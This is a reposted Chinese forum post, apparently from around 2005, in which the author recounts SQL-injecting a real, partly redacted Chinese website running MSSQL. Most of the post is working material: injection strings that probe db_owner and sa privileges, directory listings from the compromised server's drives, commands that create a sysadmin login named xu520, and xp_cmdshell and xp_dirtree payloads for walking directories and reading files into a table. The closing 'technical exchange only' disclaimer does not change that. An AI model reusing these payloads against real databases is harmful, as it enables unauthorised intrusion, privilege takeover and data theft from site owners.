[转载]中国某某网漏洞 MSSQL Injection
文章作者:xu520之所以要写这样一文章,是觉得国内网站,真得作得不够安全,当然只是菜菜的我一点小的想法,呵呵。[第一次写文章]多多指教。
国内ASP网站,很多。如果我说得没有错的话,90%可以注入。[如果我错了,我想也有100%可以注入了]呵呵。直接进入主题。
无意来到中国##网,试了一下在后缀加个逗号。返回"处理 URL 时服务器出错。请与系统管理员联系。"呵呵。[注入是通过构造精心的查询语句,再根据WEB返回的信息来判断数据库中的信息]
我不想手工了,如果有人想手工的话,呵呵,也能算作是高手了,我不想浪费青春,呵呵
用啊D了
啊D返回一个可以注入点[[url]http://www.####.com/dh/hf_flash_lx.aspx?lx=2[/url]];
经过一个简单的检测,
[and 1=(select IS_MEMBER('db_owner'));-- //判断数据库连接帐号权限]
[and 1=(select @@VERSION)-- //获得服务器信息,版本号 ]
[and 'sa'=(select System_user)-- //连接用户是否SA ]
[and%200<>user-- //查看用户权限 ]
(当然啊D还返回了一个注入点,在检测中,要多试一些可注入目录,可能有新的收获)
SQLSERVER 信息:
多句执行:支持
子查询:支持
当前用户:DBO
用户权限:SA
当前库:DH
存在数据库:master tempdb model msdb pubs ...
瞧瞧C盘:
c:\ 的目录
2004-12-03 12:06 1,024 .rnd
2004-11-06 14:28 0 AUTOEXEC.BAT
2004-11-06 14:28 0 CONFIG.SYS
2005-01-02 03:59 <DIR> data_bk
2004-11-06 14:34 <DIR> Documents and Settings
2004-12-03 14:24 <DIR> Downloads
2005-01-08 11:21 0 NB_Commander_Txt.log
2004-11-06 16:31 <DIR> NVIDIA
2004-12-03 13:49 <DIR> Program Files
2004-12-03 12:11 <DIR> Raptor
2005-01-04 15:41 91,275 ServerNamespace.xml
2005-01-08 10:39 0 siweb_cmd.log
2005-01-05 10:56 808 sys.log
2004-12-31 21:42 <DIR> WINDOWS
2004-12-28 15:35 <DIR> wmpub
7 个文件 93,107 字节
8 个目录 1,578,176,512 可用字节
再瞧瞧D盘:
驱动器 D 中的卷是 server
卷的序列号是 1C13-E360
D:\ 的目录
2004-03-31 17:39 <DIR> 2000server安装
2004-05-23 15:57 <DIR> 4.0.4.1
[意外数据]
2004-08-04 10:11 <DIR> aida1
2001-01-17 16:57 2,185 CFGQUIET.INI
2004-11-05 19:09 <DIR> Config.Msi
2004-11-02 14:55 <DIR> CopyLock
2004-06-10 12:33 <DIR> DATA
2004-12-31 21:13 <DIR> dh
2004-05-02 14:23 <DIR> dh1
2004-06-07 12:22 19,148,288 dh_20040507
2004-05-26 20:20 22 dh_zs_1.zip
2005-01-08 10:51 2,097 disonbbs7sp2.asp
2004-05-25 11:38 1,065,472 dm
2004-05-17 14:24 4,845,417 dm.zip
2004-03-31 11:54 <DIR> dreamboot
2004-12-03 23:29 <DIR> dvbbs7.0.0_Ac(1)
2004-07-02 03:36 2,060,737 dvbbs7.0.0_Ac(1).exe
2004-04-25 18:32 <DIR> dvbbs7.0.0_Ac1
2004-04-25 17:13 281,244 dvbbs7.0.0_sp2_up.exe
2004-05-31 07:01 1,663,938 fg160a.exe
2001-09-25 22:29 2,239,624 fpse02_x86_CHS.exe
2004-03-19 16:03 <DIR> JMail4.2Pro
2004-07-15 09:48 4,584,960 job
2004-05-24 15:16 0 MSI2C.tmp
2004-09-27 15:01 <DIR> MSI98e2a.tmp
2004-11-05 17:43 <DIR> MSIe8e33.tmp
2004-03-22 16:04 <DIR> office11_fp_chs
2004-03-22 16:01 389,740,544 office11_fp_chs.ISO
2004-11-06 16:53 <DIR> Program Files
2004-09-09 16:40 <DIR> recover
2004-11-28 03:27 9,092,234 rhcity_bk.rar
2004-03-03 11:18 <DIR> seru
2004-11-05 12:52 <DIR> Serv-U
2003-07-24 11:15 156,706,368 setup.exe
2002-06-07 10:29 <DIR> sharept
2004-12-03 17:56 <DIR> soft
好点好玩。郁,一个网页设计不错的网站*—*—*
;exec master.dbo.sp_addlogin xu520;-- //加一个xu520的SQL帐号,密码为空
;exec master.dbo.sp_password null,xu520,xu520;-- //把xu520的密码改为xu520
;exec master.dbo.sp_addsrvrolemember xu520 sysadmin;-- //把xu520用户加到sysadmin组里去[返回正常,说明成功]
以上都是偷别人苦苦构造的查询语句,在此谢谢前辈。
也可以在数据库建一个表,把你要想查询内容拷贝进这个表,再把表的内容显示出来。
遍历目录的方法:
create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
//建立一个叫temp的表
insert temp exec master.dbo.xp_availablemedia;
// 获得当前所有驱动器,并写入temp表中
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\www',1;--
//获得C盘目录下的目录,并写如temp表
insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--
//获得所有子目录的目录树结构,并存入temp表中
insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--
//把c:\web\index.asp的内容写入到temp表
and 1=(select count(*) from temp where id >1);--
//暴表里的数据
呵呵。不过很高难度,我人懒,所以没有学精,不敢讲。。。写得有点乱,见恕。
本文只作技术交流,请不要作出对任何网站的攻击活动!
推荐学习网站:[url]http://www.fineacer.com/[/url]
页:
[1]